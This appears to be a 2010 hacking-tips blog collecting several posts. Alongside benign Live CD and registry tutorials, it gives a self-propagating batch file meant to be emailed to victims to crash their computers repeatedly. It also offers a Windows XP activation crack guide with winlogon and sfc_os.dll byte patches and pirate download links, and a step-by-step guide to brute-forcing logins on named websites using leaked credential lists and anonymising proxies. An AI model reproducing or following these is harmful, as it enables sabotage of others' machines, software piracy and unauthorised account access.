Tuesday 31 August 2010

HOW TO MAKE ANY SOFTWARE PORTABLE..!!

Requirements :

1) Winrar
DOWNLOAD FROM HERE - http://www.megaupload.com/?d=ZGP5FCXB

2) Universal Extractor
DOWNLOAD FROM HERE - http://www.softpedia.com/get/Compression-tools/Universal-Extractor.shtml
Working -
Step1) First take the set up file of the software that you want to make portable. Here I am taking Mozilla Firefox set up file.

Step2) Now install both Winrar and Universal Extractor.

Step3) Now put the set up file in a folder say AH. Now right click on the set up file and select UniExtract to Subdir.


Step4) This will extract all the dll files and some folders along with the executable (exe) file. In my case the name of the exe file is setup.exe but it depends upon the software so in your case it will be different. Just copy the whole name along with the extension i.e setup.exe

Step5) Now press Ctrl+A and select all the extracted files and folders and right click on it and select Add to archive.


Step6) Now when you will click on Add to archive a new window will open, its Winrar application. In the right side in General tab put a tick on Create SFX Archive

Step7) Now go to Advance tab at the top and click on SFX Options.


In the Set Up Program in Run After Extraction enter the name of the file along with the extension that your copied in Step4 i.e setup.exe

Step9) When you will click OK second time, Winrar will create a file and this is your portable application.
 
 Thats Done

Monday 30 August 2010

How To Create Windows Live CD

Tools Required

  • Bart PE
  • Your Windows installation CD

Steps

  1. Download and install the latest version of Bart PE. Fire up the PE Builder. This is the main screen that appears:
  2. pe builder - create windows live cd
  3. All additional functionality that you want to add is done by means of plug-ins. There are loads of them to choose from. Plug-ins are nothing but a way to add additional software to your Live CD. You can visit the Bart PE plug-in repository here.
  4. For our purposes we require a special plug-in called Windows XPE, which gives us a way to boot into a GUI environment similar to Windows as opposed to the usual command line interface. You are free to choose any other plug-ins for additional functionality that you want to add. There are plug-ins for disc recovery, office work, backups, disk imaging and so on.
  5. Now insert your Windows Installation disc and point PE Builder to the CD/DVD drive containing the Windows installation disc or the location of the copied files (great if you have a laptop and the i386 folder containing the files).
  6. Click on the plug-ins button at the bottom. This allows you to add more software and tweak the existing software/plug-ins. If you get an error here, chances are that the path you provided in source is not correct.
  7. create windows live cd
  8. Click ‘add’ and browse to the location where you stored the Windows XPE plug-in to add it. Since we are using the XPE plug-in you can safely disable the Nu2shell, PENETCFG and A43 plugins since these offer functionality that is already included with the XPE plug-in.
  9. Click ‘close’. You can now directly burn a disc or save an ISO file for testing which you can burn later. Click ‘build’ and PE builder will get to work.
  10. If the build process completes without any errors, you have made yourself a Live CD.
Mine completed in just under 2 minutes without any errors and amounted to 270 MB with Windows XPE plug-in and 154 MB without it. Here are the screen shots from my LiveCD which I tested in VirtualBox:
There are additional hacks that you can use to customize the text that appears when loading, the wallpaper and other things. However, that required editing some files and is a little cumbersome. In any case, with or without the visual customizations, you now have a fully functional Live CD with the tools you want according to your specific requirements. There are numerous other possibilities that you can explore with such a tool. For example you can create a Live DVD with all your favorite programs and documents.
Have you ever created a custom Live CD? What PE Builder plug-ins did you use or plan to use when you created one? Do you know of some other tool that can be used tp make Windows Live CD? Why not share it in the comments?

Friday 27 August 2010

Start Hack

COPY "C:\Users\Owner\Desktop\clickme.bat" "C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"

start clickme.bat
clickme.bat


1. Open Notepad.
2. Paste the following...


Code:
COPY "C:\Users\Owner\Desktop\clickme.bat" "C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"

start clickme.bat
clickme.bat


3. Save it as, "clickme.bat"
4. Send it to them over email or whatever.

What does this do? They will click on it, it will open multiple command prompt windows until the computer crashes. When they restart their computer, it will start again!

TIPS:
1. Make sure you tell them to save the file on the desktop .
2. Make sure they run Windows .


to stop it , just open your windows in safe window and delete these two files


Code:
1. C:\Users\Owner\Desktop\clickme.bat

2. C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\

Registry Editor

Opening the registry editor

This is step number one, just opening the editor to view the registry.

This is easy, just click on the start button and then on run. Once run is open, type in regedit and click OK.

Navigating the registry

Once you have regedit open, it is fairly easy to get where you want to.

Now you see the "folders" HKEY_CLASSES_ROOT, HKEY_CURRENT_USER, HKEY_LOCAL_MACHINE, HKEY_USERS, and HKEY_CURRENT_CONFIG

First lets get some basic terminology down. These five main "folders" are calles hives, and their subfolders are called keys.

Click on the + next to HKEY_CURRENT_USER to expand the hive.

Now if you wanted to open HKEY_CURRENT_USER\Software\Microsoft, click the + next to Software, then the + next to Microsoft.

This is how you can get to any place within the registry.

Exporting registry keys

This should be done to any and all registry keys before changing them.

It will give you an easy way of changing back any changes that you make editing the registry.

Right click the key that you want to export, and select Export.

Then give it a name so you remember what it is. I use the name of the key as an example.

Importing registry files

Now that you have exported keys to change back your changes, you need to know how to import them into the registry.

Usually a double-click on a registry file will merge it for you unless you have changed the default action, then you have to right-click the file and select Merge.

Changing existing values

You now know how to navigate to different keys in the registry and how to back up these keys before you make changes to them.

Logically next you need to know how to make these changes.

There are three main types of registry values that you will deal with: STRINGS, DWORDS, and BINARY values.
There are others, but these are 99% of what you will deal with doing normal editing.

To change an existing STRING value, just double click it and enter in the new value data.

To change an existing DWORD value you have two options, hexadecimal and decimal. Be sure you know what type the value should be, 200 hexadecimal is 256 decimal, c8 is hexadecimal for 200 decimal, for example.

To change binary values it is a little more complicated because they are written in hex.

The applicable values are entered in 2's and have the format 00 01 02 - 0F - FF and each have a different value associated with them.

Having to change a binary value from something other than 01 to 00 or 00 to 01 is pretty rare.

Adding new values

Adding values is very similar to changing them with the exception that you have to name the value.

Right click in the left-hand-side of the registry editor and select New > String (or whatever value type you want to add) and then name it what you need.

Then you change its value by doing the same method as if it was an existing value.

Adding new keys

Along with adding values, this is most helpful if you are trying to add group policy values through the registry.
Most of the keys that are needed for them are not there by default.

So, you need to add a key under HKEY_CURRENT_USER\Software\Policies\Microsoft, how?

Easily, just right-click on HKEY_CURRENT_USER\Software\Policies\Microsoft in the folder tree, and then New > Key

Now you need to change the name of the key to the desired name.

Deleting keys and values

The first thing that must be realized when deleting keys or values is that there is no 'Recycle Bin' for the registry, once its gone its gone.

To delete keys or values, just right-click them and select delete. Also keep in mind that deleting a key also deletes all subkeys of that key.

Writing registry files

Now you can automate the manual entry and deletion of registry values and keys with .reg files. Use notepad or wordpad to write registry files, you just save them with a .reg extension.

The first line in the registry file for XP or 2000 has to be:

Windows Registry Editor Version 5.00


NOTE: For windows 98, ME, NT 4.0, [also works with XP and 2k] replace with:

REGEDIT4

Put a line in between Windows Registry Editor 5.00 and the next entry.

Now you have to declare the key that you want to change values in by writing it in brackets.

This will also create the key if the one declared doesn't exist:

[HKEY_CURRENT_USER\Key\Subkey]

Now the next line will either create the string "String 1" equal to "Value 1" if "String 1" doesn't exist,
or change the value of the string "String 1" to "Value 1" if it does:

"String 1"="Value 1"


The (default) value is a string and you use the "at" symbol for this.

@="Default 1"

To change or create dword values, you must know the value in hexadecimal, for that is how they are written.

The next line will create the dword "Dword 1" equal to a decimal 20, by setting it equal to dword:00000014,
or if "Dword 1" already exists, it will change it's value to a decimal 20.

Just remember dword:00000010 is actually decimal 16, dword:0000000a is decimal 10

"Dword 1"=dword:00000014

Now binary values. This line will create or change a binary value "Binary 1" equal to 01 AA 05 55.

"Binary 1"=hex:01,AA,05,55

So this is the reg file to add a string, default, dword, and binary value to HKEY_CURRENT_USER\Key\Subkey:

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Key\Subkey]
"String 1"="Value 1"
@="Default 1"
"Dword 1"=dword:00000014
"Binary 1"=hex:01,AA,05,55

Now how to delete values or keys with regfiles.

If you want to delete a key just put a minus sign in front of it in the file:

[red[-HKEY_CURRENT_USER\Key\Subkey]

If you want to delete a value, it doesn't matter what kind, set the value equal to a minus.

"String 1"=-

@=-

"Dword 1"=-

"Binary 1"=-

So if you wanted to add a dword "Dword 1" that equals 1,
and delete the value "String 1" in HKEY_CURRENT_USER\Key\Subkey1 and delete the HKEY_CURRENT_USER\Key\Subkey2, the file would look like:

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Key\Subkey1]
"Dword 1"=dword:00000001
"String 1"=-

[-HKEY_CURRENT_USER\Key\Subkey2]

The final thing to learn is how to comment the files,
add a semiclon in front of any line and it will be ignored:

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Key\Subkey1]
;This changes the dword to equal 1
"Dword 1"=dword:00000001
;This deletes the string value
"String 1"=-

;This deletes the key Subkey2
[-HKEY_CURRENT_USER\Key\Subkey2]

This should help you navigate and hack through the registry with atleast a partial map to guide you.

WIn XP Hack

Contents:

1. CIACommander
2. WpaKill
3. Activate
4. Enable Updates
5. Windows Genuine Validation Bypass


-=========== ========= ========= ========= -
Windows 2003 & XP & LH
Anti Product Activation Crack 2.0.1
-=========== ========= ========= ========= -

The crack will patch some bytes in your
winlogon.exe and totally disable the
Windows Product Activation Check.

Tested with winlogon.exe build:
Windows XP 2600.0 (Retail)
Windows 2K3 3790.0 (Retail)
Windows XP 2600.2180 (SP2 RTM)
Windows XP 2600.1106 (SP1)
Windows 2K3 3790.1218 (8.7.2004)
Windows Longhorn 4008 or 4015(not tested by myself)

This version uses a generic patch engine
which supports all current version of Windows
and hopefully all future ones. :)


The Options
===========

1. Read all about the options.
2. Don't change anything you without a reason.


* Apply OOBE Fix
This applies the Out Of Box Experience ->OOBE Patch
which removes the 'Activate Windows' link from the
start menu and makes the Activating Windows Dialog
saying 'Already Activated'

Note: This is more a cosmetically fix and really not
needed for the patch to work properly.


* Apply WPA Fix
This removes the WPA-Check in Winlogon.exe.
If you want to get rid of the Windows Activation
this MUST be Enabled !
Disable this if you just want to undo the OOBE-Fix.

Note: However you can use this program also to
decrypt and unprotect other MS-Files
like DPCDLL.dll or LICDLL.DLL. So if you
do so disable this option.


* Remove selfcheck blocks
If you press the 'Apply' Button the self checks are always
disable by 'correcting' the pointer.

This option will additionally overwrite the self check block
calls in the program code with the Value 90 (NOP=No OPeration)
and will improve the readability of disassembly.

Note: This option is absolutely not necessary for the patch to work.


* Remove crypt blocks
This will decrypt the crypt program parts of the input file and
write them back to into the exe and do some other fixes to keep the
File executable. If you want to disassemble the file enable this one.

Note: This option is absolutely not necessary for the patch to work.


* Debug: Save decrypted code to *.bin
Writes each decrypted program parts into a file with the
address as filename looking like this: 2C18D.bin, 3678B.bin...


* Debug: Save decrypted code to exe
Writes each decrypted program parts back into the file.
If the option 'Remove crypt blocks' is not check just the decrypted
RAW-Output is written into the exe. (After you enable this you
have to right click on 'Apply/Browse' and open the file you want
to decrypt)

Note: This option is dangerous!
Without having 'Remove crypt blocks' option enabled this will
make crash the input file crash for sure.
This option is absolutely not necessary for the patch to work.


* Debug: Verbose Output
Output Debug information
This may be helpful to identify some problems.


============ ========= ========= ========= ========= ==
F A Q - Frequently Asked Questions
============ ========= ========= ========= ========= ==

???????????? ????????? ????????? ????????? ????????? ????????? ????????? ????????? ?????
I after I have installed a Service pack an the Activation the
Activation Reminder ?counting down the days -is show again.
???????????? ????????? ????????? ????????? ????????? ????????? ????????? ????????? ?????

You must reapply the patch every time after you installed a servicepack and
everything will be fine :)

Note: The Patch don?t ?activated? Windows it only removes the check in winlogon.exe
which test if windows is activated or if it?s still in the evaluation period
and force you to logoff if something is wrong.

When you install a servicepack winlogon.exe is normally overwritten by a new
Not patched Version. So you need reapply the patch?
Usually the servicepack reset the trial counter so it will restart at 30 days.

???????????? ????????? ????????? ????????? ????????? ????????? ????????? ????????? ?????
I can?t start patch because my evaluation period expired and
Now I?m unable to login.
???????????? ????????? ????????? ????????? ????????? ????????? ????????? ????????? ?????

You can still login in safe mode even if your evaluation period expired.
Press F8 right after the Bios boot screen and select Safe Mode
(Without Network support) menu now windows should boot in safe mode and you can
Login and apply the Anti-WPA-Patch.

Note: Since no Network support is available in safe mode no Internet or Network
Is available so it?s good to have the patch somewhere on the hard disk or on a
floppy disk?
If you select Safe Mode (with Network support) you are unable to login due to
Activation is necessary.

???????????? ????????? ????????? ????????? ????????? ????????? ????????? ????????? ?????
I want to change my CD-Key - but msoobe.exe also says
'Already Activated and don't show the Activation Dialog
???????????? ????????? ????????? ????????? ????????? ????????? ????????? ????????? ?????

Enable option 'Apply OOBE Fix' and
Disable option 'Apply &WPA Fix' -to keep the WPA-Patch active-
then click on the 'Restore Backup' Button

PREVIOUS VERSIONS:
Start regedit and go to
HKLM\SOFTWARE\ Microsoft\ Windows NT\CurrentVersion\ WPAEvents\ [OOBETimer]
Edit this and set Last Byte to FF.
Start this -if the Activation are delete- to show the Activation dialog:
%SYSTEMROOT% \system32\ oobe\msoobe. exe /A

???????????? ????????? ????????? ????????? ????????? ????????? ????????? ????????? ?????
Is it possible to integrate WPA_KILL.EXE in the WinXP setup-routine?
I have a WinXP pro setup CD (sp2 integrated).
???????????? ????????? ????????? ????????? ????????? ????????? ????????? ????????? ?????

Integrating the AntiWPA Patch in the Windows Setup:

1. Extract [WindowsSetupDir] \i386\winlogon. ex_ to a temporary Dir.
(Winrar or winace will do the job - or rename it to winlogon.cab and
double-click on it - to use the build-in WindowsCabExtract)

2. Apply the WPA Crack to the file.
Right click on 'Apply/Browse' and choose the file.
(To unlock all buttons of the WPA-Patch right click on 'Quit')

3. Repack winlogon.exe an put it back in the installation folder
Use Winace (and choose MS-Cab as compression method) and name
the packed cab-file winlogon.ex_ .
Or use the makecab.exe( included in Windows XP) start cmd.exe in the dir
winlogon.exe is in and Enter:

makecab winlogon.exe

After that you will get winlogon.ex _ as output.

PREVIOUS VERSIONS:
In previous versions the PE Checksum of the file wasn't updated by the patch.
This caused setup to reject winlogon.exe during installation.
But this has been fixed in this version.


Manually OOBE_Fix for WindowsSetup
------------ --------- --------- ----
Since I see people integrating the patched winlogon.exe into windows setup are
perfectionist here's a hint how to may you get rid of the activationlinks in
the startmenu (-untested-) :
Ok unpack and edit syssetup.inf

1. search for
[StartMenuCommon]
and delete this to avoid the activate link in START
%oobe_desc% = oobe\msoobe. exe,"%%SYSTEMROOT% %\system32\ oobe\msoobe. exe /A",,0,"@%SystemRoot% \system32\ oobe\msoobe. exe,-2001","%SystemRoot% \system32\ oobe\msoobe. exe",2000
(btw you can also delete this unless %windowscatalog% link section if you like)

2. In SystemTools it's the same
[SystemTools]
%oobe_desc% = oobe\msoobe. ex...

Just for better understanding the inf-file format at the end is defined what the variable "oobe_desc" is:
oobe_desc = "Windows aktivieren"
This was were I first stepped when I searched for "Windows aktivieren" in C:\windows
The second was to look for oobe_desc...

No-CDKey-Patch for WindowsSetup
------------ --------- --------- -
- Since I got some positiv feedback about this I decided to publish this.
But so far I'ven't test it myself-

This will make the WindowsSetup to accept any -even a blank- CDKey
Get "http://antiwpa. cjb.net/Other/ cracked pidgen for setup.rar"
Pack it pidgen.dll with cab-pack to pidgen.dl_ as decribed above
and put it in the I386 setupdir.
That's it.

???????????? ????????? ????????? ????????? ????????? ????????? ????????? ????????? ???????
What changes does this patch to my System and how to undo it?
???????????? ????????? ????????? ????????? ????????? ????????? ????????? ????????? ?????

1. It modifies c:\WINDOWS\system32 \Winlogon. exe and creates a
backup named Winlogon.bak
UNDO: Rename Winlogon.exe -> Winlogon.OUT
Rename Winlogon.bak -> Winlogon.exe
After Reboot you will be able to delete Winlogon.OUT if you like


2. The RegistryValue
HKLM\SOFTWARE\ Microsoft\ Windows NT\CurrentVersion\ WPAEvents\ [OOBETimer]
is set to a fixed value as it is activated.
UNDO: Edit this with Regedit and set Last Byte to FF.
This will 'DeActivate' Windows

Note: Normally this value is written (not read!) by winlogon.exe on
every start up just as information for MSOOBE.
This value has no effect on the real Activation.


3. The 'Activate Windows' Link from the Startmenu is remove
UNDO: Start\Execute:
rundll32 setupapi,InstallHin fSection RESTORE_OOBE_ ACTIVATE 132 syssetup.inf

Other Changes:
HKLM\SOFTWARE\ Microsoft\ Windows\CurrentV ersion\Setup
"SourcePath" and "ServicePackSourcePa th" will be temporary delete during the patch
and (if nothing real bad happens) restored if it's finished.

???????????? ????????? ????????? ????????? ????????? ????????? ????????? ????????? ?????
How to set another path to Winlogon.exe?
???????????? ????????? ????????? ????????? ????????? ????????? ????????? ????????? ?????

Right click on the 'Apply/Browse' button.
If the Patch is already and the 'Apply/Browse' button is greyed out
Right click on the 'Quit' button to force unlock all buttons.

Note: You can also use the Windows Anti WPA Patch to de-protect
(Remove SelfCheckBlock SCB) from other protected
Microsoft exe and dll's:
For ex: licdll.dll, DPCDLL.dll or Windows PLUS! Pack Executables
Of course the WPA-Patch is skipped in this case.

???????????? ????????? ????????? ????????? ????????? ????????? ????????? ????????? ?????
The Patch doesn't work after I rebooted, the WPA Reminder pops up again.
Also during the Patch the Windows Systemfile Protection Dialogbox didn't
come up.
???????????? ????????? ????????? ????????? ????????? ????????? ????????? ????????? ?????

Maybe the Patch was undone by the Windows File Protection.
To check if the patch is still active start the Windows Anti WPA Patch again and check if it says 'Patch already applied'.

???????????? ????????? ????????? ????????? ????????? ????????? ????????? ????????? ?????
How to disable this damn Windows File Protection(WFP) ?
???????????? ????????? ????????? ????????? ????????? ????????? ????????? ????????? ?????

There is no really official way to disable this

This is an undocumented setting worked for recent windows versions:
HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows NT\CurrentVersion\ Winlogon
SFCDisable=0xffffff 9d

BUT: It was removed in Windows 2000 Service Pack 2 and in Windows XP!
When you restart your computer, the System event log will contain Event ID 64032, "Windows File Protection is not active on this system."

SFCDisable (REG_DWORD)
0 = enabled (default - WinXP Professional)
1 = disabled, prompt at boot to re-enable - Require a kernel debugger to be hooked up or this will be ignored!
2 = disabled at next boot only, no prompt to re-enable - Require a kernel debugger to be hooked up or this will be ignored!
4 = enabled, with popups disabled (default - for all Server Windows)
More about this and how to re-enable the 'SFCDisable=0xffffff 9d-setting'
-> http://www.collakes oftware.com/ aboutwfp. htm
To make this more flexible here is a search'n'replace patch:
(Rename sfc_os.dll to sfc_os.OUT; copy sfc_os.OUT to sfc_os.dll)
Open sfc_os.dll in a hex editor
Search for : 83 f8 9D 75 08 33 C0 40
Replace with: 83 f8 9D EB 08 33 C0 40

So this is where it comes from:
A1 D8E1C376 MOV EAX, [SFCDisable]
Patch- > 83F8 9D CMP EAX, -63 ; = 0xffffff9d !
Search > 75 08 JNZ SHORT Don't_Set_SFCDisable_ =_1
Data > 33C0 XOR EAX, EAX
> 40 INC EAX
A3 D8E1C376 MOV [SFCDisable] , EAX
:Don't_Set_SFCDisable
Btw this fragment is the reason 0xffffff9d don't work anymore - so alternatively Nop Out (=overwrite with 0x90) that bastard



Well I found a real simple way to disable this for sure:
Rename c:\WINDOWS\system32 \sfc.dll to sfc-OUT.dll to something else
After Reboot the WFP is disabled.
BUT I advice to rename sfc-OUT.dll back to sfc.dll soon because I notice
that you can't install any new hardware device driver because syssetup.dll
statically imports sfc.dll and fail to load if sfc.dll is not found.

???????????? ????????? ????????? ????????? ????????? ????????? ????????? ????????? ????????? ?????????
The Patcher doesn?t find any offset. / Know problem on Asian systems.
???????????? ????????? ????????? ????????? ????????? ????????? ????????? ????????? ????????? ?????????

WPA_KILL.EXE currently don't work with Asian Systems (Taiwan, Japan...) with DBCS (Double Character Set)
enabled. If you have such systems disable DBCS or patch your winlogon.exe on a non DBCS system
apply the patch and copy it back in your system.

As far as I found out the Test Version function does not work properly and you get 'unknown Version'.
A Workaround that might work is to use the offset locator to detect/set the right offset manually.
(Hint: Compare the detected offset with the known-offset- list)
The problem is related to some improper char handling and/or comparing inside FrmMain.Test( ) i.e FileStream:: FixedString( )
Everyone how has an Asian System and MSOffice(Note: VBA is always also installed together with MSO) or Visual Basic 6 is welcome to invite me to a remote Session. - so I can examine and fix that problem - Please send me an email...
And of course you?re also welcome to fix it your self:
\other\cracknfo\ problem-onasian- systems.rar
\SRC\antiwpa- 1.6.2-winxp- 2k3-src.zip

???????????? ????????? ????????? ????????? ????????? ????????? ????????? ????????? ????????? ?????????
How you access/modify the winlogon.exe file while the winlogon process is running ?
I only saw you are using standart API calls but I must have missed something...
???????????? ????????? ????????? ????????? ????????? ????????? ????????? ????????? ????????? ???????

How to modify a File (like winlogon.exe) while it is in use:

1.Rename winlogon.exe -> winlogon.bak
That's the most important thing about that. You can't delete or
modify a file that's in use, but you can RENAME it! (under Win9x
this don't work. But there you can rename the dir the file is in...)

2.Copy winlogon.bak -> winlogon.exe

3.Now you can edit winlogon.exe. Of course you can't delete (or
modify) winlogon.bak as long as it is in use.
But you surely want to keep an backup of it, don't you?

Oh I almost forgot to mention an other annoy thing:
>The Windows system File Protection (WFP) 'D:\installs\ WinXP_SP2. out'
So the WFP won't file them to restore

Well the WPA-Patch doesn't rename your Windows installation path it deletes temporary the path to this in you registry and restores it after the patch (actually after you clicked on the OK button of the messagebox).
These Registry paths are:
HKLM\SOFTWARE\ Microsoft\ Windows\CurrentV ersion\Setup
"SourcePath"= "D:\installs\ WinXP_CD"
"ServicePackSourcePa th" ="D:\installs\ WinXP_SP2"

------------ --------- --------- --------- --------- --------- -
Just a hint to see if the patch worked without to Reboot:

1.Apply the patch
2.Logon as an other user
(But don't log of - choose change/disconnect user)
3.When you login just see if the patch works...
... or if not this damn
'You haven't activated your Windows yet...' message

(4.If you logoff the first user now 'winlogon.bak' is no long in use
and you can delete/modify it)

Ah and to get a better overview about the processes which are running on your machine use this: http://www.sysinter nals.com/ ntw2k/freeware/ procexp.shtml
And next time you can't delete a files use 'search handle' and enter the filename then close the handle(=file) or kill the process...

???????????? ????????? ????????? ????????? ????????? ????????? ????????? ????????? ????????? ?????????
Does the AntiWPA Crack make winlogon.exe unstable?
???????????? ????????? ????????? ????????? ????????? ????????? ????????? ????????? ????????? ?????????

Since the WPA 1.6.2 disables all anti crack self checks in winlogon.exe it may execute some msec faster :)
The patch simply makes winlogon.exe to skip the function which will do the WPA-Check( update of WPA Trialcounter)
and block any login if the result is 'negative'.

From 'outside' this windows is simple not activated but as long your using a valid CDKEY Windows update will work and is not affected by the WPA-Patch
> does the patch make winlogon.exe unstable?
No. If it is applied correctly winlogon.exe will not become unstable/crash.
(The only time winlogon.exe becomes unstable is after appling wpa-kill 1.1 to WinXP SP1 - but this bug was fix in version 1.2...)
Of course with the wrong offset in offset locator you can make winlogon.exe unstable/crash or by killing the patcher during the patch is applied.

???????????? ????????? ????????? ????????? ????????? ????????? ????????? ????????? ?????
PREVIOUS VERSIONS:
I got 'ERROR: Unknown Version of winlogon.exe'.
Can you include this version in your WPA-Patcher ?
???????????? ????????? ????????? ????????? ????????? ????????? ????????? ????????? ?????

Well please try the offset locator button to patch this new Version. Since Version 1.4 I added a heuristic search for offset locator which should find the right offset by default and highlight it.
So -after you read the warning- just double click on the highlight Offset on the List to set this as new patch-Offset.

If this is not a Beta or Release Candidate Version send me your -unpatched- Winlogon.exe by email and add if the default offset (found by the for offset locator) works.

???????????? ????????? ????????? ????????? ????????? ????????? ????????? ????????? ?????
PREVIOUS VERSIONS:
The patch don't work - if i click on the 'Activate Windows' link in the
start menu, it says Windows isn't activated and that there are only xx days left.
???????????? ????????? ????????? ????????? ????????? ????????? ????????? ????????? ?????

This patch didn't stop the trial counter nor will it 'Activate' your Windows.

The WPA-Patch fixes the condition jump which decides whether windows was started in safe mode
and the activation check should be skipped or if it was started in normal mode and it should be done.
So in short it will make winlogon.exe to skip the is-Windows-activate d check when you logon.

To see if the patch work wait about one minute after you logon -
if the Activation reminder balloon in the tray bar DON'T pop up - the patch IS working.
Some other things to see that it works
The messagebox that reminders you to active if there are only 5 days left and
The messagebox that says you're not allowed to logon until you active will be away.

So patching msobmain.dll just to make it say it's activated is only additional overheat and
also may cause some problems. Maybe if you want to change your CDKey and you don't reach the CDKEY change dialog because it says already activated...
Ok what I need to do is to include some FAQ-info text in the next version about that issue.
Maybe I will add a "Let's Activate Windows" force true patch if there is such a big need for this
I mean if this will make someone sleeps better at night - is enough for a good reason.



http:\\Antiwpa. cjb.net


XP Activation

Installation:
Run - "Activate.exe ". wait until the windows says:
"Already Activaded" or something... don't close it.

Now run - "Enable Updates.exe" Wait until it fixed.

Now close all Windows, and restart your PC

DOWNLOAD

http://rapidshare. com/files/ 16707564/ x_h_by_kissme1. rar.html

PASSWORD : kissme1

How to crack a website

So you want to know how to crack your way into a website....


OK... First lets look at some facts of the matters...

#1 You cannot enter a website by cracking into it without having a valid combination of username and password. No matter how hard you try, if you don't have a user/pass in your wordlist that is in the websites password file, it will not work.

#2 You should use proxies. Duh... Proxies keep you anonymous by passing your http data through them, and then they are the ones who submit the data and do it using their IP addy instead of your own. NO PROXY IS ANONYMOUS UNLESS YOU CONTROL IT! Most all proxies log the transactions they run so all it takes is a government to supena the owner and get the data.

#3 You should use software. By far the easiest software to use is Access Diver. Why is it the easiest? You can leech wordlists, proxies and use it to do the actual cracking. Its like a Bowflex for cracking passwords...

That out of the way lets get down to it...

What is a wordlist and why do I need it. We are going to bruteforce the targets because, by nature, it is faster then hand typing. Access Diver is an excellent BF'er. It will try anywhere from 8,000 - 100,000 combos per hour. Depending on how fast your connection is, how fast the targets connection is, how fast the proxies are, your mileage may very. A wordlist is a compiled list of past known good combos used by real people on websites. We prefer refined lists where the websites the combos where good for and similar in genre to the websites we are attacking. Huh? In other words, having a list made of combos that were from mature websites isn't going to help us get into a teen niche site. But we are newbs eh? So we will make a larger general purpose list.

First open AD and select, My Skill - Expert. We are almost elite already! How many situations in life besides for snow skiing let you pick your own skill level? Then click the history tab. Should be pretty darn empty. Now we leech like fuckers... But we have to start somewhere so lets get to it. Visit many, many passboards looking for previously cracked passes. Prefer boards where people are posting them 100's to 1000's per post or where the admin compiles them daily into such large numbers. We want them in the http standard basic authentication format. what?

Like this:
http://LSW-asp547:warrior@www.tawneestone.com/members/
http://LSW-willie:abc123@www.tawneestone.com/members/

http:// login : pass @www.website.com/members directory/

We copy them to the clipboard after selecting the with the mouse and then in AD we can ShiftF2 or right click and import from clipboard... After hunting down say 20,000 such passwords we want to get some proxies.

Clicking on the Proxy tab and then the WEB proxy leecher sub tab we add in some proxy sites:

http://www.samair.ru/proxy/
http://atomintersoft.com/products/alive ... list/?ap=2
http://atomintersoft.com/products/alive ... list/?ap=1
http://atomintersoft.com/products/alive ... list/?ap=3
http://atomintersoft.com/products/alive ... list/?ap=4
http://atomintersoft.com/products/alive ... list/?ap=5
http://atomintersoft.com/products/alive ... list/?ap=6
http://atomintersoft.com/products/alive ... list/?ap=7
http://atomintersoft.com/products/alive ... list/?ap=8
http://atomintersoft.com/products/alive ... list/?ap=9
http://www.samair.ru/proxy/proxy-02.htm
http://www.samair.ru/proxy/proxy-03.htm
http://www.samair.ru/proxy/proxy-04.htm
http://www.samair.ru/proxy/proxy-05.htm
http://www.samair.ru/proxy/proxy-06.htm
http://www.samair.ru/proxy/proxy-07.htm
http://www.samair.ru/proxy/proxy-08.htm
http://www.samair.ru/proxy/proxy-09.htm
http://www.samair.ru/proxy/proxy-10.htm
http://www.samair.ru/proxy/proxy-11.htm
http://www.samair.ru/proxy/proxy-12.htm
http://www.samair.ru/proxy/proxy-13.htm
http://www.samair.ru/proxy/proxy-14.htm
http://www.samair.ru/proxy/proxy-15.htm
http://www.samair.ru/proxy/proxy-16.htm
http://www.samair.ru/proxy/proxy-17.htm
http://www.samair.ru/proxy/proxy-18.htm
http://www.samair.ru/proxy/proxy-19.htm
http://www.samair.ru/proxy/proxy-20.htm

Save that to a file named extraction.txt and load it with the folder icon into AD. One of the things I really like about AD is if you use windows, this thing is almost completely self explanitory. The author made it with certain standard icons so you could know how most of the thing works just by looking at it. If you need hints to something before you press it, just hold your mouse cursor over it and it will popup a little explanation.

Now all of the imported URL's should have a check in the box next to them. If not, click the little check box icon on the left bar menu. Put the number 20 in the little black box towards the bottom and click the start button. When it is done, click the add these proxies in button on the right middle and select to add them to the analyzer.

Now click the proxy analyzer subtab and right click a proxy and select all, right click again and select remove duplicates, right click once more and select remove govt' and dangerous proxies. Then in the top two black boxes with numbers in them, make them 80 and 40. If you are on a modem, you can change it to smaller numbers if you keep getting timeouts. Towards the bottom you have a few more tabs, click the proxy judge tab and select the one that matches:
http://www.age.ne.jp/x/maxwell/cgi-bin/prxjdg.cgi

Then on the special tab make sure it is set for the last option (basic authentication) and finally for parameters, don't check anything off for now.

In the very top is a green long text box with server next to it. Put:
http://www.captainstabbin.com/members
into it. We use this server because it is their old one and no one else uses it so it is fast. Also it is before they used any kind of protection to block multiple failed login attempts and we want as many good proxies as we can get.

Click the speed and accuracy button at the top next to the box you put 80 into and wait for it to finish. When it is done, click the heading for the column labeled Accuracy and it will sort them by what happened. Scroll down to the Timed Out ones and select them (click the first so it is selected, scroll to the last, hold the left shift key down and select the last one, they should all be selected (welcome to windows 101)). Then click the Speed/Accuracy button again and let it check them again. When done, click the Delay column header and it sorts them by speed. Scroll up and select the first one with no speed number and then down to the last one without a delay speed number and select them. Now right click and delete the selection. Next click the Confidentiality tester button and wait for it to stop. Then click the Anonymous heading and sort em... Scroll down and select the first timed out to the last Uncheckable. Click the Confidentiality tester button again and wait... Now sort by delay again and scroll up. Remove those without a delay number again. Now you have anonymous proxies... yeah.. next right click and select, Make selected proxies your default proxy list. It should put you on the My List subtab.

Click the Use WEB proxies box. Then click the rotate proxies and put a 1 in the box.
Click change on 4xx/5xx
Click change on fakes
don't click on redirections
Click on specific words and put


Click retry user:pass
Click Don't use proxy after...
Don't click on Continue to use timedout proxies

Select Reactivate all proxies from the drop down menu.

Select the first proxy at the top of the list.

Go back to the history tab. Right click and select all. Put a 50 in the black box or a smaller number if on slower connections (timeouts occure). Click the yellow arrow that looks like it is wrapped around something cylindrical.

